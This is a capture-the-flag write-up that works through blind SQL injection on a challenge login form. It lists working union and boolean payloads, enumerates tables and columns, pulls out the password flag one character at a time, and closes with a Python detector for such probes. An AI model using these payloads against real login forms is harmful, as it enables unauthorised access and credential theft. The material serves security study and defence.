Tags: web sql-injection
# ▼▼▼PASSWORD_EXTRACTION(Web:50pts,211/661=31.9%)▼▼▼
This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)
---
## 【Identify database】
```
username=&password='union select 1,1-- ⇒ Invalid login info.
username=&password='union select 1,1--+ ⇒ You've successfully authorized, but that doesn't get you the password.
```
↓
A **SQL Injection** vulnerability exists, and the trailing `+` is required: MySQL's `--` comment only takes effect when it is followed by whitespace, and the URL-encoded `+` decodes to a space. This is the behavior of **MySQL**.
---
## 【Finding an attack method】
`limit 1` is required because the application checks that the query returns exactly **one** row.
↓
```
username=&password='or(1=1)limit 1--+ ⇒ You've successfully authorized, but that doesn't get you the password.
username=&password='or(1=0)limit 1--+ ⇒ Invalid login info.
```
↓
The responses differ, so **Blind SQL Injection** is possible.
---
## 【Get table and column names】
```
username=&password='or 97=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))--+ ⇒a
username=&password='or 99=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))--+ ⇒c
username=&password='or 99=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))--+ ⇒c
username=&password='or 111=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))--+ ⇒o
username=&password='or 117=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),5,1))--+ ⇒u
username=&password='or 110=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),6,1))--+ ⇒n
username=&password='or 116=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),7,1))--+ ⇒t
username=&password='or 115=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),8,1))--+ ⇒s
```
↓
The table name is `accounts`.
---
```
username=&password='or 112=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),1,1))--+ ⇒p
username=&password='or 97=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),2,1))--+ ⇒a
username=&password='or 115=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),3,1))--+ ⇒s
username=&password='or 115=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),4,1))--+ ⇒s
username=&password='or 119=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),5,1))--+ ⇒w
username=&password='or 111=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),6,1))--+ ⇒o
username=&password='or 114=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),7,1))--+ ⇒r
username=&password='or 100=ascii(substr((select concat(column_name) from information_schema.columns where table_name=`accounts` limit 1),8,1))--+ ⇒d
```
↓
The column names are `username` and `password`.
---
## 【Get flag】
```
username=&password='or 103=ascii(substr(password,1,1)) limit 1--+ ⇒g
username=&password='or 105=ascii(substr(password,2,1)) limit 1--+ ⇒i
username=&password='or 103=ascii(substr(password,3,1)) limit 1--+ ⇒g
username=&password='or 101=ascii(substr(password,4,1)) limit 1--+ ⇒e
username=&password='or 109=ascii(substr(password,5,1)) limit 1--+ ⇒m
username=&password='or 123=ascii(substr(password,6,1)) limit 1--+ ⇒{
~(omitted)~
username=&password='or 125=ascii(substr(password,26,1)) limit 1--+ ⇒}
```
↓
`gigem{h0peYouScr1ptedTh1s}`
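As an added example from the defender's side (not part of the original writeup): the probes above have a recognisable shape once the login body is URL-decoded the way the server sees it (`+` becoming a space, which is what made the `--+` terminator work). The Python below scores each submitted parameter against those shapes over a few constructed request bodies; the body list, signature names and alert threshold are assumptions of this example.

```python
import re
from urllib.parse import parse_qs

# Constructed request bodies (assumption of this example, not captured traffic):
# one benign login, one awkward-but-legitimate password, and three bodies
# shaped like the union / boolean-blind probes in the writeup above.
SAMPLE_BODIES = [
    "username=alice&password=hunter2",
    "username=bob&password=O'Brien--",
    "username=&password='union select 1,1--+",
    "username=&password='or 97=ascii(substr((select table_name from "
    "information_schema.tables where table_schema=database() limit 1,1),1,1))--+",
    "username=&password='or 103=ascii(substr(password,1,1)) limit 1--+",
]

# Each signature is one feature of the probes shown on this page.
SIGNATURES = {
    "quote_then_boolean": re.compile(r"'\s*\(?\s*(or|and|union)\b", re.I),
    "char_oracle": re.compile(r"\bascii\s*\(\s*substr(ing)?\s*\(", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.", re.I),
    "row_limit": re.compile(r"\blimit\s+\d+", re.I),
    "comment_tail": re.compile(r"--\s*$"),  # '--+' becomes '-- ' after decoding
}

def decode_body(body):
    """Decode the form body the way the server does: %XX and '+' -> space."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

def matched_signatures(value):
    """Names of every signature the decoded parameter value matches."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]

def classify(body, threshold=2):
    """Flag a body when any one parameter trips at least `threshold` signatures.
    The threshold keeps a lone quote or a trailing '--' in a real password
    from alerting on its own."""
    hits = {k: matched_signatures(v) for k, v in decode_body(body).items()}
    hits = {k: v for k, v in hits.items() if v}
    return {"suspicious": any(len(v) >= threshold for v in hits.values()),
            "hits": hits}

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        result = classify(body)
        print("ALERT" if result["suspicious"] else "ok   ", body[:60], result["hits"])
```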